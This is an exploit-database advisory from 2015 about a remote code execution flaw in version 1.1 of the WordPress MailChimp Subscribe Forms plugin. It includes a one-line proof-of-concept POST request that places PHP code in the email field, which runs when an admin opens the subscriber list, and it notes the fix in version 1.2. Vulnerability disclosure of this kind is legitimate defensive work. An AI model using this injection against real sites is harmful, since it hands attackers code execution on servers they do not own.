header-logo
Suggest Exploit
vendor:
MailChimp Subscribe Forms
by:
woodspeed
8.8
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: MailChimp Subscribe Forms
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: YES
Related CWE: None
CPE: a:wordpress:mailchimp_subscribe_sm:1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Apache 2.2.22, PHP 5.3.10
2015

WordPress MailChimp Subscribe Forms Remote Code Execution

Remote Code Execution via email field. When the admin user checks the subscibers list, the php code is executed.

Mitigation:

Fixed in version 1.2
Source

Exploit-DB raw data:

# Exploit Title: Wordpress MailChimp Subscribe Forms Remote Code Execution
# Date: 21-04-2015
# Exploit Author: woodspeed
# Vendor Homepage: https://wordpress.org/plugins/mailchimp-subscribe-sm/
# Software Link: https://downloads.wordpress.org/plugin/mailchimp-subscribe-sm.1.1.zip
# Version: 1.1
# Tested on: Apache 2.2.22, PHP 5.3.10
# OSVDB ID : http://www.osvdb.org/show/osvdb/121081
# WPVULNDB ID : https://wpvulndb.com/vulnerabilities/7935
# Category: webapps

1. Description

Remote Code Execution via email field.

2. Proof of Concept

POST Request

sm_email=<?php echo 'Current PHP version: '. phpversion();?>&submit=

When the admin user checks the subscibers list, the php code is executed.

3. Solution

Fixed in version 1.2